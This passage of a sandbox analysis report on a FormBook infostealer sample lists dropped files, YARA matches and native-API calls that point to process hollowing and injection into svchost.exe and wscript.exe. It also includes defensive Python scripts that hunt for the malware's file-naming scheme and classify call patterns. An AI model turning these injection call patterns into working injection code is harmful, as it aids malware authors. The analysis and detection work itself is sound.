 Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrv.ini
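The three dropped files share one naming scheme, which makes them a host-level indicator. The following is an added example (not the report's or any vendor's code) that hunts a Roaming profile for that scheme: an 8-character alphanumeric directory whose first three characters prefix each file name, followed by logr and one letter. That generalisation from the three observed names is an assumption; other FormBook builds may use other names, so a hit is a lead to verify, not a verdict. The directory tree the example scans is constructed in a temporary folder so it runs offline.

```python
"""Hunt a Roaming profile for the FormBook data directory seen in this
report. Added example; the naming pattern is generalised from three files."""
import os
import re
import tempfile

DIR_RE = re.compile(r"^[A-Za-z0-9]{8}$")


def formbook_files(roaming):
    """Return [(directory, [matching files])] for each directory directly
    under `roaming` that fits the naming scheme and holds at least one file."""
    hits = []
    for entry in sorted(os.listdir(roaming)):
        path = os.path.join(roaming, entry)
        if not (os.path.isdir(path) and DIR_RE.match(entry)):
            continue
        # File names carry the first three characters of the directory name
        # (K4O1B2B4 -> K4Ologri.ini, K4Ologrf.ini, K4Ologrv.ini in the report).
        file_re = re.compile(r"^%slogr[a-z]\.ini$" % re.escape(entry[:3]))
        files = sorted(f for f in os.listdir(path) if file_re.match(f))
        if files:
            hits.append((entry, files))
    return hits


def build_sample_tree():
    """Constructed stand-in for a Roaming profile: the report's paths plus
    two benign look-alikes that must not be flagged. Returns the temp root."""
    roaming = tempfile.mkdtemp(prefix="roaming_")
    infected = os.path.join(roaming, "K4O1B2B4")
    os.makedirs(infected)
    for suffix in ("i", "f", "v"):
        open(os.path.join(infected, "K4Ologr%s.ini" % suffix), "w").close()
    os.makedirs(os.path.join(roaming, "Microsoft", "Windows"))   # normal profile content
    os.makedirs(os.path.join(roaming, "ABCDEFGH"))               # 8 chars, wrong file names
    open(os.path.join(roaming, "ABCDEFGH", "settings.ini"), "w").close()
    return roaming


if __name__ == "__main__":
    # On a live host: formbook_files(os.environ["APPDATA"])  (APPDATA is the Roaming folder)
    for directory, files in formbook_files(build_sample_tree()):
        print(directory, files)
```

The scan is deliberately narrow (one directory level, exact suffix shape) so it can be run fleet-wide without noise; widen the regex only after confirming the naming on a second sample.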
 Malicious sample detected (through community Yara rule)
 Both of the following community rules matched each of the 32 sources listed below (the same 16 memory dumps and 16 unpacked PEs as under "Yara detected FormBook"):
 Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
 Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
 Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
 Source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
 Source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
 Source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
 Source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
 Source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
 Source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
 Source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
 Source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
 Source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
 Source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
 Source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
 Source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
 Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
 Source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
 Source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
 Source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
 Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
 Source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
 Source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
 Source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
 Source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
 Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
 Source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE
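The "Contains functionality to call native functions" entries that follow attribute a long list of Nt* calls to each process, and the combination of calls is what supports the injection verdicts. The following is an added example (not the report's or any vendor's code) that parses entries in the report's own "Code function" format, groups the native calls per process, maps them against a small technique table, and checks whether the LdrInitializeThunk-tailed wrappers seen in three processes are one code block relocated to a different base in each. SAMPLE is a subset of the report's entries copied verbatim; the technique table is this example's heuristic grouping of native APIs and not the sandbox's rule set, so its names are assumptions.

```python
"""Classify per-process Nt* calls from sandbox 'Code function' entries and
detect a shared, relocated syscall-stub table. Added example; SAMPLE is a
subset of the report's entries."""
import re
from collections import defaultdict

SAMPLE = " ".join([
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_0045CA34 GetSubMenu,SaveDC,RestoreDC,7337B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_0045CA34",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA2D0 NtClose,LdrInitializeThunk, 3_2_00AAA2D0",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA240 NtReadFile,LdrInitializeThunk, 3_2_00AAA240",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA4A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00AAA4A0",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA480 NtMapViewOfSection,LdrInitializeThunk, 3_2_00AAA480",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA720 NtResumeThread,LdrInitializeThunk, 3_2_00AAA720",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA6A0 NtCreateSection,LdrInitializeThunk, 3_2_00AAA6A0",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AABA30 NtSetContextThread, 3_2_00AABA30",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA650 NtQueueApcThread, 3_2_00AAA650",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAB470 NtOpenThread, 3_2_00AAB470",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA5A0 NtWriteVirtualMemory, 3_2_00AAA5A0",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAB0B0 NtGetContextThread, 3_2_00AAB0B0",
    r"Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AABD40 NtSuspendThread, 3_2_00AABD40",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A2D0 NtClose,LdrInitializeThunk, 5_2_02F6A2D0",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A240 NtReadFile,LdrInitializeThunk, 5_2_02F6A240",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A480 NtMapViewOfSection,LdrInitializeThunk, 5_2_02F6A480",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A4A0 NtUnmapViewOfSection, 5_2_02F6A4A0",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A720 NtResumeThread, 5_2_02F6A720",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6BA30 NtSetContextThread, 5_2_02F6BA30",
    r"Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A650 NtQueueApcThread, 5_2_02F6A650",
    r"Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2323 NtUnmapViewOfSection, 14_2_022B2323",
    r"Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2B39 NtResumeThread, 14_2_022B2B39",
    r"Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B6BE1 NtMapViewOfSection, 14_2_022B6BE1",
    r"Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B51A7 NtQueryInformationProcess, 14_2_022B51A7",
    r"Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA2D0 NtClose,LdrInitializeThunk, 15_2_00ADA2D0",
    r"Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA240 NtReadFile,LdrInitializeThunk, 15_2_00ADA240",
    r"Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA480 NtMapViewOfSection,LdrInitializeThunk, 15_2_00ADA480",
])

# "Source: <image> Code function: <pid>_<run>_<addr> <callee,callee,...>, <same id>"
ENTRY = re.compile(r"Source: (.+?) Code function: (\d+)_(\d+)_([0-9A-Fa-f]+) (\S+), \2_\3_\4")
NT_CALL = re.compile(r"^Nt[A-Z]\w*$")   # excludes user32's NtdllDefWindowProc_A and raw addresses

# Heuristic minimal native-API sets per technique: (all required, any one of)
TECHNIQUES = {
    "process_hollowing": ({"NtUnmapViewOfSection", "NtResumeThread"},
                          {"NtMapViewOfSection", "NtWriteVirtualMemory"}),
    "apc_injection": ({"NtQueueApcThread"}, set()),
    "section_mapping": ({"NtCreateSection", "NtMapViewOfSection"}, set()),
    "thread_context_hijack": ({"NtSuspendThread", "NtGetContextThread", "NtSetContextThread"}, set()),
}


def parse_entries(text):
    """Yield (image, pid, run, address, [callees]) for each entry."""
    for m in ENTRY.finditer(text):
        image, pid, run, addr, callees = m.groups()
        yield image, int(pid), int(run), int(addr, 16), callees.split(",")


def native_calls(text):
    """(pid, image) -> set of Nt* functions referenced from that process."""
    calls = defaultdict(set)
    for image, pid, _, _, callees in parse_entries(text):
        calls[(pid, image)].update(c for c in callees if NT_CALL.match(c))
    return calls


def techniques(nt_set):
    return sorted(name for name, (required, any_of) in TECHNIQUES.items()
                  if required <= nt_set and (not any_of or any_of & nt_set))


def summarise(text):
    """(pid, image) -> sorted technique names matched by its native-call set."""
    return {key: techniques(s) for key, s in native_calls(text).items()}


def ldr_stubs(text, pid):
    """function -> address of the wrappers that tail into LdrInitializeThunk."""
    return {c[0]: addr for _, p, _, addr, c in parse_entries(text)
            if p == pid and "LdrInitializeThunk" in c and NT_CALL.match(c[0])}


def relocation_delta(text, pid_a, pid_b):
    """The single constant offset between two processes' stub tables, or None
    when offsets disagree or nothing is comparable. One constant delta means
    the same code was mapped at a different base in each process."""
    a, b = ldr_stubs(text, pid_a), ldr_stubs(text, pid_b)
    deltas = {b[f] - a[f] for f in a.keys() & b.keys()}
    return deltas.pop() if len(deltas) == 1 else None
```

On the subset, process 3 matches every technique in the table, svchost.exe matches hollowing and APC queuing, the sdv88p2lg.exe loader (process 14) matches hollowing only, and the GUI code of process 0 matches nothing because NtdllDefWindowProc_A is a user32 export, not a native call. The stub tables of processes 3, 5 and 15 differ by one constant each (0x024C0000 and 0x30000), so the three processes carry the same wrapper code at three bases, which the system ntdll.dll, loaded at one base in every process, cannot explain.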
 Contains functionality to call native functions
 The wrappers that tail into LdrInitializeThunk sit at identical offsets from three different bases (0x00AAAxxx in process 3, 0x02F6Axxx in process 5, 0x00ADAxxx in process 15), so they are one code block mapped into each process rather than the system ntdll.dll, which loads at the same base in every process; the 0x00416xxx entries are the unpacked payload's own image at 0x400000.
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code functions:
 0_2_00467724 NtdllDefWindowProc_A
 0_2_0045CA34 GetSubMenu,SaveDC,RestoreDC,7337B080,SaveDC,RestoreDC,NtdllDefWindowProc_A
 0_2_0044CEA0 NtdllDefWindowProc_A,GetCapture
 0_2_0042D764 NtdllDefWindowProc_A
 0_2_00467ECC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
 0_2_00467F7C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
 3_2_00416B50 NtCreateFile
 3_2_00416C00 NtReadFile
 3_2_00416C80 NtClose
 3_2_00416D30 NtAllocateVirtualMemory
 3_2_00416B4D NtCreateFile
 3_2_00416C7A NtClose
 3_2_00AAA2D0 NtClose,LdrInitializeThunk
 3_2_00AAA240 NtReadFile,LdrInitializeThunk
 3_2_00AAA3E0 NtFreeVirtualMemory,LdrInitializeThunk
 3_2_00AAA360 NtAllocateVirtualMemory,LdrInitializeThunk
 3_2_00AAA4A0 NtUnmapViewOfSection,LdrInitializeThunk
 3_2_00AAA480 NtMapViewOfSection,LdrInitializeThunk
 3_2_00AAA410 NtQueryInformationToken,LdrInitializeThunk
 3_2_00AAA5F0 NtReadVirtualMemory,LdrInitializeThunk
 3_2_00AAA560 NtQuerySystemInformation,LdrInitializeThunk
 3_2_00AAA540 NtDelayExecution,LdrInitializeThunk
 3_2_00AAA6A0 NtCreateSection,LdrInitializeThunk
 3_2_00AAA610 NtAdjustPrivilegesToken,LdrInitializeThunk
 3_2_00AAA720 NtResumeThread,LdrInitializeThunk
 3_2_00AAA700 NtProtectVirtualMemory,LdrInitializeThunk
 3_2_00AAA750 NtCreateFile,LdrInitializeThunk
 3_2_00AAB0B0 NtGetContextThread
 3_2_00AAA800 NtSetValueKey
 3_2_00AAA2F0 NtQueryInformationFile
 3_2_00AAA220 NtWaitForSingleObject
 3_2_00AABA30 NtSetContextThread
 3_2_00AAA260 NtWriteFile
 3_2_00AAA3D0 NtCreateKey
 3_2_00AAA310 NtEnumerateValueKey
 3_2_00AAA370 NtQueryInformationProcess
 3_2_00AAA350 NtQueryValueKey
 3_2_00AAACE0 NtCreateMutant
 3_2_00AAA430 NtQueryVirtualMemory
 3_2_00AAB410 NtOpenProcessToken
 3_2_00AAA460 NtOpenProcess
 3_2_00AAA470 NtSetInformationFile
 3_2_00AAB470 NtOpenThread
 3_2_00AAA5A0 NtWriteVirtualMemory
 3_2_00AAA520 NtEnumerateKey
 3_2_00AABD40 NtSuspendThread
 3_2_00AAA6D0 NtCreateProcessEx
 3_2_00AAA650 NtQueueApcThread
 3_2_00AAA780 NtOpenDirectoryObject
 3_2_00AAA710 NtQuerySection
 3_1_00416B50 NtCreateFile
 3_1_00416C00 NtReadFile
 3_1_00416C80 NtClose
 3_1_00416D30 NtAllocateVirtualMemory
 Source: C:\Windows\SysWOW64\svchost.exe Code functions:
 5_2_02F6A2D0 NtClose,LdrInitializeThunk
 5_2_02F6A260 NtWriteFile,LdrInitializeThunk
 5_2_02F6A240 NtReadFile,LdrInitializeThunk
 5_2_02F6A3E0 NtFreeVirtualMemory,LdrInitializeThunk
 5_2_02F6A3D0 NtCreateKey,LdrInitializeThunk
 5_2_02F6A360 NtAllocateVirtualMemory,LdrInitializeThunk
 5_2_02F6A350 NtQueryValueKey,LdrInitializeThunk
 5_2_02F6A310 NtEnumerateValueKey,LdrInitializeThunk
 5_2_02F6A800 NtSetValueKey,LdrInitializeThunk
 5_2_02F6A6A0 NtCreateSection,LdrInitializeThunk
 5_2_02F6A610 NtAdjustPrivilegesToken,LdrInitializeThunk
 5_2_02F6A750 NtCreateFile,LdrInitializeThunk
 5_2_02F6ACE0 NtCreateMutant,LdrInitializeThunk
 5_2_02F6A480 NtMapViewOfSection,LdrInitializeThunk
 5_2_02F6A470 NtSetInformationFile,LdrInitializeThunk
 5_2_02F6A410 NtQueryInformationToken,LdrInitializeThunk
 5_2_02F6A560 NtQuerySystemInformation,LdrInitializeThunk
 5_2_02F6A540 NtDelayExecution,LdrInitializeThunk
 5_2_02F6A2F0 NtQueryInformationFile
 5_2_02F6BA30 NtSetContextThread
 5_2_02F6A220 NtWaitForSingleObject
 5_2_02F6A370 NtQueryInformationProcess
 5_2_02F6B0B0 NtGetContextThread
 5_2_02F6A6D0 NtCreateProcessEx
 5_2_02F6A650 NtQueueApcThread
 5_2_02F6A780 NtOpenDirectoryObject
 5_2_02F6A720 NtResumeThread
 5_2_02F6A710 NtQuerySection
 5_2_02F6A700 NtProtectVirtualMemory
 5_2_02F6A4A0 NtUnmapViewOfSection
 5_2_02F6B470 NtOpenThread
 5_2_02F6A460 NtOpenProcess
 5_2_02F6A430 NtQueryVirtualMemory
 5_2_02F6B410 NtOpenProcessToken
 5_2_02F6A5F0 NtReadVirtualMemory
 5_2_02F6A5A0 NtWriteVirtualMemory
 5_2_02F6BD40 NtSuspendThread
 5_2_02F6A520 NtEnumerateKey
 5_2_00416B50 NtCreateFile
 5_2_00416C00 NtReadFile
 5_2_00416C80 NtClose
 5_2_00416D30 NtAllocateVirtualMemory
 5_2_00416B4D NtCreateFile
 5_2_00416C7A NtClose
 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code functions:
 14_2_022B2323 NtUnmapViewOfSection
 14_2_022B2B39 NtResumeThread
 14_2_022B6BE1 NtMapViewOfSection
 14_2_022B51A7 NtQueryInformationProcess
 14_2_022B31A6 NtQueryInformationProcess
 14_2_022B47C4 NtQueryInformationProcess
 15_2_00ADA2D0 NtClose,LdrInitializeThunk
 15_2_00ADA240 NtReadFile,LdrInitializeThunk
 15_2_00ADA3E0 NtFreeVirtualMemory,LdrInitializeThunk
 15_2_00ADA360 NtAllocateVirtualMemory,LdrInitializeThunk
 15_2_00ADA4A0 NtUnmapViewOfSection,LdrInitializeThunk
 15_2_00ADA480 NtMapViewOfSection,LdrInitializeThunk
 15_2_00ADA410 NtQueryInformationToken,LdrInitializeThunk
 15_2_00ADA5F0 NtReadVirtualMemory,LdrInitializeThunk
 15_2_00ADA560 NtQuerySystemInformation,LdrInitializeThunk
 15_2_00ADA540 NtDelayExecution,LdrInitializeThunk
 15_2_00ADA6A0 NtCreateSection,LdrInitializeThunk
 15_2_00ADA610 NtAdjustPrivilegesToken,LdrInitializeThunk
 15_2_00ADA720 NtResumeThread,LdrInitializeThunk
 15_2_00ADA700 NtProtectVirtualMemory,LdrInitializeThunk
 15_2_00ADA750 NtCreateFile,LdrInitializeThunk
 15_2_00ADB0B0 NtGetContextThread
 15_2_00ADA800 NtSetValueKey
 15_2_00ADA2F0 NtQueryInformationFile
 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code 
function: 15_2_00ADA220 NtWaitForSingleObject, 15_2_00ADA220 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADBA30 NtSetContextThread, 15_2_00ADBA30 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA260 NtWriteFile, 15_2_00ADA260 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA3D0 NtCreateKey, 15_2_00ADA3D0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA310 NtEnumerateValueKey, 15_2_00ADA310 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA370 NtQueryInformationProcess, 15_2_00ADA370 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA350 NtQueryValueKey, 15_2_00ADA350 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADACE0 NtCreateMutant, 15_2_00ADACE0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA430 NtQueryVirtualMemory, 15_2_00ADA430 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB410 NtOpenProcessToken, 15_2_00ADB410 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA460 NtOpenProcess, 15_2_00ADA460 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB470 NtOpenThread, 15_2_00ADB470 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA470 NtSetInformationFile, 15_2_00ADA470 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA5A0 NtWriteVirtualMemory, 15_2_00ADA5A0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA520 NtEnumerateKey, 15_2_00ADA520 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADBD40 NtSuspendThread, 15_2_00ADBD40 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA6D0 NtCreateProcessEx, 15_2_00ADA6D0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA650 NtQueueApcThread, 15_2_00ADA650 Source: C:\Program Files 
(x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA780 NtOpenDirectoryObject, 15_2_00ADA780 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA710 NtQuerySection, 15_2_00ADA710 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1ACE0 NtCreateMutant,LdrInitializeThunk, 18_2_04A1ACE0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A560 NtQuerySystemInformation,LdrInitializeThunk, 18_2_04A1A560 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A610 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_04A1A610 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A2D0 NtClose,LdrInitializeThunk, 18_2_04A1A2D0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A3E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_04A1A3E0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A360 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_04A1A360 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A4A0 NtUnmapViewOfSection, 18_2_04A1A4A0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A480 NtMapViewOfSection, 18_2_04A1A480 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A430 NtQueryVirtualMemory, 18_2_04A1A430 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A410 NtQueryInformationToken, 18_2_04A1A410 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B410 NtOpenProcessToken, 18_2_04A1B410 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A460 NtOpenProcess, 18_2_04A1A460 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B470 NtOpenThread, 18_2_04A1B470 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A470 NtSetInformationFile, 18_2_04A1A470 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A5A0 NtWriteVirtualMemory, 18_2_04A1A5A0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A5F0 NtReadVirtualMemory, 18_2_04A1A5F0 Source: 
C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A520 NtEnumerateKey, 18_2_04A1A520 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1BD40 NtSuspendThread, 18_2_04A1BD40 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A540 NtDelayExecution, 18_2_04A1A540 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A6A0 NtCreateSection, 18_2_04A1A6A0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A6D0 NtCreateProcessEx, 18_2_04A1A6D0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A650 NtQueueApcThread, 18_2_04A1A650 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A780 NtOpenDirectoryObject, 18_2_04A1A780 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A720 NtResumeThread, 18_2_04A1A720 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A700 NtProtectVirtualMemory, 18_2_04A1A700 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A710 NtQuerySection, 18_2_04A1A710 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A750 NtCreateFile, 18_2_04A1A750 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B0B0 NtGetContextThread, 18_2_04A1B0B0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A800 NtSetValueKey, 18_2_04A1A800 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A2F0 NtQueryInformationFile,